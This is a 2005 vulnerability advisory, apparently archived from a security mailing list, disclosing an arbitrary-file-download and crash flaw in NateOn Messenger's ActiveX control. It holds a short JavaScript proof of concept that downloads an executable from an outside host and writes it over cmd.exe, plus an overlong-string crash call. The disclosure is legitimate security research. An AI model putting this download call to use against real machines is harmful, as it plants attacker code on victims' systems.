Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS
Discoverer: PARK, GYU TAE (saintlinu@private)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS
Where: From remote
Operating System: Windows Only
Solution: unpatch yet
Workaround: N / A
Notice: 09. 17. 2005 Initiate notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't response. Disclosure
vulnerability
Description:
The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on
If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX
and there is another vulnerability like Buffer Overflow
See following detail describe:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
alert('NateOn Messenger already installed. Do
Attack ...');
// if you want to second order attack then try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');
// if you want to crash to victim system the try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');
} else {
alert('NateOn Messenger NOT Installed');
}
</--snip-->
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr)
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com)
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)
This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT